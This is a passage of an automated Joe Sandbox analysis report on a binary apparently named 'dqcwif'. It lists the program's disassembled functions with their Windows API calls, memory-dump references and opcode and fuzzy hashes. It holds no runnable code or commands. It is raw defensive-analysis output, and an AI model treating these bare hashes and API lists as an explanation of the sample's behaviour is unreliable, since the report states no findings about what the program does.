                                                                                                          • WaitForSingleObject.KERNEL32(?,?,?,00007FF6B5B829AD,?,?,?,00007FF6B5B32AB2), ref: 00007FF6B5BA0055
                                                                                                          • ~SyncLockT.VCCORLIB ref: 00007FF6B5BA005E
                                                                                                            • Part of subcall function 00007FF6B5B9F7B8: CloseHandle.KERNEL32(?,?,?,00007FF6B5BA0063,?,?,?,00007FF6B5B829AD,?,?,?,00007FF6B5B32AB2), ref: 00007FF6B5B9F7C9
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00007FF6B5B829AD,?,?,?,00007FF6B5B32AB2), ref: 00007FF6B5BA006A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3142591903-0
                                                                                                          • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                          • Instruction ID: ed17d64a6a11bbbcc13b72aadbf46336a74c20871d80d651784bea4f14aae8ea
                                                                                                          • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                          • Instruction Fuzzy Hash: 7901083AA18B4586E7519F19E4502697370FB99F90F144035DB8E83BAADF3CD896C740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorExitLastThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1611280651-0
                                                                                                          • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                          • Instruction ID: 0bc48dda8b988952981059376e5db98760fd5f9d1c72fef1fcd495e03a5a4df3
                                                                                                          • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                          • Instruction Fuzzy Hash: A7012C21B08A8292FA495B28E4B45BC2261FF42F75F605734C77E826DADF2CAC588300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625713937-0
                                                                                                          • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                          • Instruction ID: cc358faefc423d84da143dac8612bc74c90a197bb68946204a7c0802585ad9a6
                                                                                                          • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                          • Instruction Fuzzy Hash: 9E01B522D0C54386F7955B19A9697B43B32BF06F90F184138D75DC52EACF7DAC448304
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                          • String ID:
                                                                                                          • API String ID: 179993514-0
                                                                                                          • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                          • Instruction ID: 3b0fa496beca9007c5bf1575c693d49a54ca709fa6203d9b5efa09e2027654d2
                                                                                                          • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                          • Instruction Fuzzy Hash: 6FF06D10F5D64643FB541BBE6868AF852527F5BF82F885030CB0AC22DBDD7DACE98640
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                          • String ID:
                                                                                                          • API String ID: 179993514-0
                                                                                                          • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                          • Instruction ID: 926d47ed8c7351d5062919845aace0dcd2f5ac1bb00696c981c8ad07290ce987
                                                                                                          • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                          • Instruction Fuzzy Hash: 51F03054F5960A82FF1517BE6C68AF413526F9AF42F845030CA0A823DBDD2D9CE94600
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                          • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                          • Instruction ID: cbcfbdb7ecf62767bed3fd81172e435a73d0dfaee4f379b18d18420eba248765
                                                                                                          • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                          • Instruction Fuzzy Hash: 8F814E72D0830A86FF664F1E95702B9A6A0AF13F44F644035EB0AD76CADE6DBD509601
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                          • String ID: $*
                                                                                                          • API String ID: 3215553584-3982473090
                                                                                                          • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                          • Instruction ID: 7e3912e3fdbc27bc79fc148782b82f8a3b57aaf9f77946f69fc13a6d6c57dcdc
                                                                                                          • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                          • Instruction Fuzzy Hash: 11612F7290C2428AEF798E2D90653BC3BA1FB57F19F241135C74A8529FCF28EC41D601
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _set_statfp
                                                                                                          • String ID: !$acos
                                                                                                          • API String ID: 1156100317-2870037509
                                                                                                          • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                          • Instruction ID: 6b2975ec22f6ff8d7f72ed99035b3dbd686824d039a9b5db81d062b35f817f4d
                                                                                                          • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                          • Instruction Fuzzy Hash: E561CC21D28F4585E6238F3CA8312B69754BFA77D0F119336EB5EB59AADF1CA4438600
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _set_statfp
                                                                                                          • String ID: !$asin
                                                                                                          • API String ID: 1156100317-2188059690
                                                                                                          • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                          • Instruction ID: 940147396cff170ebc4501033cb5e2eb986935d51b93e9f9fff3250ae032a325
                                                                                                          • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                          • Instruction Fuzzy Hash: 83618A21D28F8585E657CF3CA8323B69754AF977D0F108336EB5EB59AADF1CA4434600
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                          • String ID: P
                                                                                                          • API String ID: 135850232-3110715001
                                                                                                          • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                                          • Instruction ID: 5ef83b5c6db93917bb33599fc217b300328b4d0c49384ae72f8e0717ea06e232
                                                                                                          • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                                          • Instruction Fuzzy Hash: B041D322A08A8186EB20DF19C4553ED6761EB96FA0F168231DB6D877DBDF3CD942C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID: SysTreeView32
                                                                                                          • API String ID: 847901565-1698111956
                                                                                                          • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                          • Instruction ID: 8baa881be3b090448983ae5269f4168cf63452689e45f6e45c30e54c8d041ee8
                                                                                                          • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                          • Instruction Fuzzy Hash: BC413A32A097D28AE7709B28A454B9A77A1F785B60F144335DBAC47AD9CF3CD885CF40
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 1752125012-2298589950
                                                                                                          • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                          • Instruction ID: 90434197093f7c1b63cbb6d28f9db9b08b73adea45a052ab2f6c9bd654bffb92
                                                                                                          • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                          • Instruction Fuzzy Hash: 29317F36A18B8596EB60CB19E4507AA7361FB86F95F508136DB8D83B99CF3CD845CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                          • String ID: Listbox
                                                                                                          • API String ID: 3747482310-2633736733
                                                                                                          • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                                          • Instruction ID: 008f58bd640f99bb5059daef70f4b13c889d6f0584ba548382fb6147011b8261
                                                                                                          • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                                          • Instruction Fuzzy Hash: CE313C366097C187E770CF15B454A9AB7A1F789BA0F504225EBA913B99CF3DD885CF00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                          • String ID: %lu
                                                                                                          • API String ID: 2507767853-685833217
                                                                                                          • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                                          • Instruction ID: bb74a1cee5b11c0d67bcb8ef3269eb2077fb550a2cee74ff81028e53ca94e586
                                                                                                          • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                                          • Instruction Fuzzy Hash: D6316172608B8686EB14DB1AE4501ADB7A1FB8AFC0F404035EB8D83B6ADF7DD955C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                                          • String ID: %s%d
                                                                                                          • API String ID: 2330185562-1110647743
                                                                                                          • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                          • Instruction ID: f70506739c12214e70f141240a91638ee411e4b241eb147dbf6ed0da45cab841
                                                                                                          • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                          • Instruction Fuzzy Hash: AE218D21A08B8291EA14DB2AE4602FA6361FB4AFC0F545132DF9D8776BCE2CE905C701
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2280078643-1018135373
                                                                                                          • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                                          • Instruction ID: b96b177e7197d9d6d6f53636cf9c4b07ec0f50d3afb45e9f434d5b2c017721f1
                                                                                                          • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                                          • Instruction Fuzzy Hash: F221303660864182E671DF19E4501AE77A1F786FA4F400225DF9D43B9ACF3DEC86CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 33631002-4108050209
                                                                                                          • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                          • Instruction ID: 61790cb93443e702a20f038f5ab34decf5ec8a75c9b42fc5aea742e715e28bcd
                                                                                                          • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                          • Instruction Fuzzy Hash: 0321A332618B80C6D3608F25E494ADA77B4F385B94F64422AEB9D43B99CF3CCA55CB00
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5B82DD1), ref: 00007FF6B5BBAF37
                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5B82DD1), ref: 00007FF6B5BBAF4F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
